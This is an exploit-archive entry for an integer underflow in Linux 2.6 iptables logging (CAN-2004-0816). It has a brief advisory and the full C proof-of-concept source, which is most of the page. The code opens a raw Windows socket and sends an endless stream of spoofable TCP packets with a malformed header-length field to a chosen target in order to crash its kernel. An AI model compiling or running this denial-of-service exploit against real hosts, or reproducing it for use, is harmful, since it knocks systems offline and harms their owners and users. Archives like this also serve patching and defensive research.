header-logo
Suggest Exploit
vendor:
Linux Kernel
by:
felix__zhou _at_ hotmail _dot_ com
7.5
CVSS
HIGH
Integer Underflow
191
CWE
Product Name: Linux Kernel
Affected Version From: Linux kernel 2.6
Affected Version To:
Patch Exists: NO
Related CWE: CAN-2004-0816
CPE: o:linux:linux_kernel:2.6
Metasploit:
Other Scripts:
Platforms Tested: Linux
2004

Integer Underflow Vulnerability in iptables Logging Rules

This exploit takes advantage of an integer underflow vulnerability in the iptables logging rules of the Linux kernel 2.6 branch. A remote attacker can use this vulnerability to crash a computer running the affected kernel. The 2.6 Linux kernel is reported to be prone to this vulnerability, while the 2.4 kernel is not vulnerable.

Mitigation:

Apply the latest security patches and updates for the Linux kernel. Upgrade to a newer version of the kernel if possible.
Source

Exploit-DB raw data:

/*
source: https://www.securityfocus.com/bid/11488/info

It is reported that an integer underflow vulnerability is present in the iptables logging rules of the Linux kernel 2.6 branch.

A remote attacker may exploit this vulnerability to crash a computer that is running the affected kernel.

The 2.6 Linux kernel is reported prone to this vulnerability, the 2.4 kernel is not reported to be vulnerable.
*/

/* 
* 
* iptables.log.integer.underflow.POC.c 
* 
* (CAN-2004-0816, BID11488, SUSE-SA:2004:037)
*
* felix__zhou _at_ hotmail _dot_ com
*
* */

#include <stdio.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <time.h>

#pragma comment(lib,"ws2_32")

static unsigned char dip[4];
static unsigned int da;
static unsigned short dp;
static unsigned char dport[2];

static unsigned char sip[4];
static unsigned int sa;
static unsigned short sp;
static unsigned char sport[2];

/*
static void ip_csum(unsigned char *ip, unsigned int size, unsigned char *sum)
{
unsigned int csum = 0;
unsigned char *p = ip;

while (1 < size) {
csum += (p[0] << 8) + p[1];
p += 2;
size -= 2;
}

if (size) 
csum += *p;

csum = (csum >> 16) + (csum & 0xffff);
csum += (csum >> 16);

sum[0] = (((unsigned short)(~csum)) >> 8);
sum[1] = ((((unsigned short)(~csum)) << 8) >> 8);
}
*/

static void tcp_csum(unsigned char *tcp, unsigned char *ip, 
unsigned int size, unsigned char *sum)
{
unsigned int csum = 0;
unsigned char *p = tcp;

while (1 < size) {
csum += (p[0] << 8) + p[1];
p += 2;
size -= 2;
}

csum += (ip[12] << 8) + ip[13];
csum += (ip[14] << 8) + ip[15];

csum += (ip[16] << 8) + ip[17];
csum += (ip[18] << 8) + ip[19];

csum += 0x06;
csum += 0x14;

if (size) 
csum += *p;

csum = (csum >> 16) + (csum & 0xffff);
csum += (csum >> 16);

sum[0] = (((unsigned short)(~csum)) >> 8);
sum[1] = ((((unsigned short)(~csum)) << 8) >> 8);
}

static int work(SOCKET s)
{
DWORD ret = 1;
unsigned char buf[1500];
unsigned char *ip;
unsigned char *tcp;
unsigned int seq = 0x01;
struct sockaddr_in host;

ZeroMemory(buf, 1500);

ip = buf;
tcp = buf + 20;

ip[0] = 0x45; /* ver & hlen */
ip[3] = 0x28; /* tlen */
ip[8] = 0x80; /* ttl */
ip[9] = 0x06; /* protocol */
ip[10] = ip[11] = 0;
ip[12] = sip[0]; /* saddr */
ip[13] = sip[1];
ip[14] = sip[2];
ip[15] = sip[3];
ip[16] = dip[0]; /* daddr */
ip[17] = dip[1];
ip[18] = dip[2];
ip[19] = dip[3];

tcp[0] = sport[0];
tcp[1] = sport[1];
tcp[2] = dport[0]; /* dport */
tcp[3] = dport[1];
tcp[12] = 0x40; /* hlen */ /* HERE */
tcp[13] = 0x02; /* flags */

ZeroMemory(&host, sizeof(struct sockaddr_in));
host.sin_family = AF_INET;
host.sin_port = dp;
host.sin_addr.s_addr = da;

for (;; ) {
tcp[4] = (seq >> 24); /* seq number */
tcp[5] = ((seq << 8) >> 24);
tcp[6] = ((seq << 16) >> 24);
tcp[7] = ((seq << 24) >> 24);
tcp[16] = tcp[17] = 0;
seq ++;

tcp_csum(tcp, ip, 0x14, tcp + 16);

if (SOCKET_ERROR == sendto(s, buf, 0x28, 0, 
(SOCKADDR *)&(host), sizeof host)) {
if (WSAEACCES != WSAGetLastError()) {
printf("sendto() failed: %d\n", 
WSAGetLastError());

ret = 1;
} else {
printf("You must be Administrator!\n");
}

break;
}
}

return ret;
}

static char usage[] = "Usage: %s dip dport sip sport\n";

int main(int argc, char **argv)
{
WORD ver = MAKEWORD(2, 2);
WSADATA data;
unsigned char *p;
SOCKET s;
int ret = 1;
BOOL eopt = TRUE;

if (5 != argc) {
printf(usage, argv[0]);
goto out;
}

if (INADDR_NONE == (da = inet_addr(argv[1]))) {
printf("dest ip address is NOT valid!\n");
printf(usage, argv[0]);
goto out;
}

p = (unsigned char *)&da;
dip[0] = p[0];
dip[1] = p[1];
dip[2] = p[2];
dip[3] = p[3];

dp = atoi(argv[2]);
dport[0] = ((dp << 16) >> 24);
dport[1] = ((dp << 24) >> 24);

if (INADDR_NONE == (sa = inet_addr(argv[3]))) {
printf("source ip address is NOT valid!\n");
printf(usage, argv[3]);
goto out;
}

p = (unsigned char *)&sa;
sip[0] = p[0];
sip[1] = p[1];
sip[2] = p[2];
sip[3] = p[3];

sp = atoi(argv[4]);
sport[0] = ((sp << 16) >> 24);
sport[1] = ((sp << 24) >> 24);

srand((unsigned int)time(0));

if (WSAStartup(ver, &data)) {
printf("WSAStartup() failed\n");
goto out;
}

if (INVALID_SOCKET == (s = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, 0, 0, 0))) 
goto err;

if (SOCKET_ERROR == setsockopt(s, IPPROTO_IP, IP_HDRINCL, 
(char *)&eopt, sizeof(eopt)))
goto err1;

work(s);

err1:
closesocket(s);
err:
WSACleanup();

out:
return ret;
}